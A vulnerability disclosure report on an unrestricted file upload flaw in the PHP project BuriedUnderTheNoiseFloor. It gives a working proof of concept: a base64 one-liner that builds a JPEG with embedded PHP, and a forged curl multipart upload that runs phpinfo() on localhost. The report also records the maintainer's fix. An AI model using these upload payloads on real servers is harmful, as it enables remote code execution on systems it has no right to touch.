Unrestricted Upload of File with Dangerous Type in jspark311/buriedunderthenoisefloor

Valid

Reported on

Oct 13th 2021


Description

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. https://github.com/jspark311/BuriedUnderTheNoiseFloor/ is vulnerable to remote code execution via Unrestricted Upload of File with Dangerous Type as shown below:

Proof of concept

Vuln variable: $_FILES['upfile']
Snippet:

if (isset($_FILES) && isset($_FILES['upfile'])) {
    if ($_FILES['upfile']['error'] == 0) {
        if (in_array($_FILES['upfile']['type'], $allowed)) {
            $extension = end(explode('.', $_FILES['upfile']['name']));
            $file_path  = 'uploads/'.hash('sha256', $_FILES['upfile']['tmp_name'].time()).'.'.$extension;
            if (move_uploaded_file($_FILES['upfile']['tmp_name'], $file_path)) {
                $img = file_get_contents($file_path);
                $state = 1;
                ...

BuriedUnderTheNoiseFloor validates the uploaded file type, but doesnt validate the extension allowing to perform remote code execution as shown next:

Payload

Method1:

Generate a valid jpg image with embed php code at the end of it , for example in a terminal decode a base64 image:

echo '/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+iiigD//2Qo8P3BocCBwaHBpbmZvKCk7Pz4K' | base64 -d > test2.php

Select this test2.php image
Intercept the request with a proxy and change the Content type to Content-Type: image/jpg
Go to uploads directory http://localhost/BuriedUnderTheNoiseFloor-master/uploads/ and select the new php created file
Observe the phpinfo() function is executed

Method2:

In a terminal, with curl send a forged petition (php script with a img content type) in this example the path is http://localhost/BuriedUnderTheNoiseFloor-master/

curl -i -s -k -X $'POST'     -H $'Host: localhost' -H $'Content-Type: multipart/form-data; boundary=---------------------------13655746569274249392023872903' -H $'Content-Length: 238' -H $'Connection: close'    --data-binary $'-----------------------------13655746569274249392023872903\x0d\x0aContent-Disposition: form-data; name=\"upfile\"; filename=\"test2.php\"\x0d\x0aContent-Type: image/jpg\x0d\x0a\x0a<?php phpinfo();?>\x0a\x0d\x0a-----------------------------13655746569274249392023872903--\x0d\x0a' http://localhost/BuriedUnderTheNoiseFloor-master/form.php

Go to uploads directory http://localhost/BuriedUnderTheNoiseFloor-master/uploads/ and select the new php created file
Observe phpinfo() function is executed

Impact

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

We have contacted a member of the jspark311/buriedunderthenoisefloor team and are waiting to hear back 7 months ago
We have sent a follow up to the jspark311/buriedunderthenoisefloor team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the jspark311/buriedunderthenoisefloor team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the jspark311/buriedunderthenoisefloor team. This report is now considered stale. 6 months ago
J. Ian Lindsay
3 months ago

Maintainer


This has been fixed by ensuring the PHP execution policy is disable for the upload directory on the webserver.

J. Ian Lindsay validated this vulnerability 3 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
J. Ian Lindsay confirmed that a fix has been merged on 404a45 3 months ago
The fix bounty has been dropped
to join this conversation